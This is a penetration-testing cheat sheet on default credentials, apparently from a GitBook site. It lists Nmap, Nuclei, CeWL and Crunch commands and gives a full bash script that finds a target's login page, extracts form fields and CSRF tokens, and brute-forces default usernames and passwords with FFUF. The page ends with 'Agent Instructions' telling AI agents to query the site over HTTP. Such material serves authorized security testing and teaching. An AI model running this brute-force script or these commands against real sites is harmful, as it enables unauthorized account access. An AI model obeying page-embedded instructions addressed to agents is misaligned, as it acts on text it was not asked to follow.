# Default Credentials ## Check List * [ ] Determine whether the application has any user accounts with default passwords. * [ ] Review whether new user accounts are created with weak or predictable passwords. ## Methodology ### Black Box #### Default Credentials {% stepper %} {% step %} For the first step, we can view default usernames and passwords in the list of these lists using GitHub repositories {% endstep %} {% step %} Then, using the next command related to the Nmap tool and related to the switch, we execute this vulnerability on the target and identify the existence of this vulnerability {% endstep %} {% step %} And by using the next commands that are related to the tools, we can execute on the target and the existence of this damage Identify the vulnerability on the target if there is a Default Credentials vulnerability on the login page or not {% endstep %} {% step %} And then we can automatically find the authentication form on the site using the written script, and then it finds the username and password forms, and it can brute force a list of password lists and default usernames using the FFUF tool {% endstep %} {% endstepper %} *** ### White Box ## Cheat Sheet ### Vendor Default Credentials #### Default Creds {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} #### [Nmap](https://github.com/nnposter/nndefaccts) ```bash sudo nmap -p80,443 --mtu 5000 --script http-default-accounts $WEBSITE ``` ### Organization Default Passwords {% embed url="" %} #### [defaultcreds-cheat-sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet) ```bash creds search $VENDOR ``` #### [Nuclei](https://github.com/projectdiscovery/nuclei-templates/tree/main/http/default-logins) ```bash nuclei -u $WEBSITE -tags default-login ``` ### Application Generated Default Passwords #### [CeWL](https://github.com/digininja/CeWL) ```bash cewl $WEBSITE --header "Cookie: $COOKIE" -d 5 -m 4 ``` #### [Crunch](https://sourceforge.net/projects/crunch-wordlist/) {% hint style="info" %} `-t` = Password Pattern `@` = Lowercase Keywords `,` = Uppercase Keywords `%` = Digits `^` = Meta Characters Example Result: `abcompany12` {% endhint %} ```bash crunch 8 12 -t @@company%% -o /tmp/passlist.txt ``` #### [FFUF](https://github.com/ffuf/ffuf) {% hint style="info" %} Create Script {% endhint %} ```bash sudo nano default-bruteforce.sh ``` ```bash #!/bin/bash # Config & Colors RED='\e[1;31m'; GREEN='\e[1;32m'; YELLOW='\e[1;33m'; CYAN='\e[1;36m'; RESET='\e[0m' color_print() { printf "${!1}%b${RESET}\n" "$2"; } # Root Check [[ "$(id -u)" -ne 0 ]] && { color_print RED "[X] Please run as ROOT."; exit 1; } # Input Check if [ $# -lt 1 ]; then echo "Usage: $0 " exit 1 fi URL="$1" USERLIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" PASSLIST="/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt" DEPS="git seclists golang ffuf" # Install Packages for pkg in $DEPS; do if ! dpkg -s "$pkg" &>/dev/null; then color_print YELLOW "[!] Installing $pkg..." apt install -y "$pkg" fi done # Install Katana if ! command -v katana &>/dev/null; then color_print GREEN "[*] Installing katana ..." go env -w GO111MODULE=on go env -w GOPROXY=https://goproxy.cn,direct go install github.com/projectdiscovery/katana/cmd/katana@latest;sudo ln -fs ~/go/bin/katana /usr/bin/katana fi # Find Login Page LOGIN=$(katana -u "$URL" -depth 3 -silent | \ grep -iE "/(login|signin|sign-in|auth|user/login|admin/login|my-account|account|wp-login\.php)(/)?$" | \ grep -viE "lost-password|reset|forgot|register|signup|signout|logout|\.(js|css|jpg|png|gif|svg|ico)$" | \ sed 's:[/?]*$::' | sed 's:$:/:' | head -n 1) if [ -z "$LOGIN" ]; then echo "[!] No login page found. Exiting." exit 1 fi # Fetch HTML HTML=$(curl -s "$LOGIN") FORM=$(echo "$HTML" | sed -n '/
/p' | head -n 100) # CAPTCHA / reCAPTCHA Check CAPTCHA_KEYWORDS="g-recaptcha|recaptcha|h-captcha|data-sitekey|captcha|grecaptcha.execute|hcaptcha.execute" if echo "$HTML" | grep -qiE "$CAPTCHA_KEYWORDS"; then echo "[!] CAPTCHA detected on login page. Brute-force aborted." exit 1 fi # Extract Form Action and Method ACTION=$(echo "$FORM" | grep -oEi 'action="[^"]*"' | head -1 | cut -d'"' -f2) [ -z "$ACTION" ] && ACTION="$LOGIN" METHOD=$(echo "$FORM" | grep -oEi 'method="[^"]+"' | head -1 | cut -d'"' -f2 | tr '[:upper:]' '[:lower:]') [ -z "$METHOD" ] && METHOD="post" if [[ "$ACTION" == /* ]]; then BASE_URL=$(echo "$URL" | sed 's|^\(https\?://[^/]*\).*|\1|') FULL_ACTION="${BASE_URL}${ACTION}" elif [[ "$ACTION" =~ ^https?:// ]]; then FULL_ACTION="$ACTION" else BASE_URL=$(echo "$LOGIN" | sed 's|\(https\?://.*/\).*|\1|') FULL_ACTION="${BASE_URL}${ACTION}" fi # Extract Username & Password Ffiles USERNAME_FIELD=$(echo "$FORM" | grep -oEi ']*name="[^"]+"' | \ grep -Ei 'user(name)?|login(_id)?|userid|uname|mail|email|auth_user' | head -1 | sed -E 's/.*name="([^"]+)".*/\1/') PASSWORD_FIELD=$(echo "$FORM" | grep -oEi ']*name="[^"]+"' | \ grep -Ei 'pass(word)?|passwd|pwd|auth_pass|login_pass' | head -1 | sed -E 's/.*name="([^"]+)".*/\1/') [ -z "$USERNAME_FIELD" ] && USERNAME_FIELD="username" [ -z "$PASSWORD_FIELD" ] && PASSWORD_FIELD="password" # CSRF Token Extration CSRF_FIELD="" CSRF_VALUE="" HIDDEN_INPUTS=$(echo "$FORM" | grep -oiP ']+type=["'\'']?hidden["'\'']?[^>]*>') while read -r INPUT; do NAME=$(echo "$INPUT" | grep -oiP 'name=["'\'']?\K[^"'\'' ]+') VALUE=$(echo "$INPUT" | grep -oiP 'value=["'\'']?\K[^"'\'' ]+') if [[ "$NAME" =~ csrf|token|nonce|authenticity|verification ]]; then CSRF_FIELD="$NAME" CSRF_VALUE="$VALUE" break fi done <<< "$HIDDEN_INPUTS" if [ -z "$CSRF_FIELD" ] && [ -n "$HIDDEN_INPUTS" ]; then CSRF_FIELD=$(echo "$HIDDEN_INPUTS" | grep -oiP 'name=["'\'']?\K[^"'\'' ]+' | head -1) CSRF_VALUE=$(echo "$HIDDEN_INPUTS" | grep -oiP 'value=["'\'']?\K[^"'\'' ]+' | head -1) fi # Prepre POST Data DATA="${USERNAME_FIELD}=FUZZ1&${PASSWORD_FIELD}=FUZZ2" [ -n "$CSRF_FIELD" ] && [ -n "$CSRF_VALUE" ] && DATA="${CSRF_FIELD}=${CSRF_VALUE}&${DATA}" # Extract Cookies COOKIES=$(curl -s -I "$URL" \ | grep -i '^Set-Cookie:' \ | sed -E 's/^Set-Cookie: //I' \ | cut -d';' -f1 \ | grep -i 'PHPSESSID') # Extract only domain and port HOST=$(echo "$URL" | sed -E 's~^https?://([^/]+).*~\1~') # Headers HEADERS=( -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,fa-IR;q=0.5" -H "Accept-Encoding: gzip, deflate" -H "Content-Type: application/x-www-form-urlencoded" -H "Origin: $URL" -H "Sec-GPC: 1" -H "Connection: keep-alive" -H "Referer: $LOGIN" -H "Cookie: $COOKIES" -H "Upgrade-Insecure-Requests: 1" -H "Priority: u=0, i" ) # Run FFUF if [[ "$METHOD" == "get" ]]; then FFUF_URL="${FULL_ACTION}?${DATA}" ffuf -u "$FFUF_URL" \ -w "$USERLIST:FUZZ1" \ -w "$PASSLIST:FUZZ2" \ -X GET \ -ac -c -r \ -mc 200 \ "${HEADERS[@]}" else ffuf -u "$FULL_ACTION" \ -w "$USERLIST:FUZZ1" \ -w "$PASSLIST:FUZZ2" \ -X POST \ -d "$DATA" \ -ac -c -r \ -mc 200 \ "${HEADERS[@]}" fi ``` {% hint style="info" %} Run Script {% endhint %} ```bash sudo chmod +x default-bruteforce.sh;sudo ./default-bruteforce.sh $WEBSITE ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://unk9vvn.gitbook.io/penetration-testing/web/broken-authentication/default-credentials.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.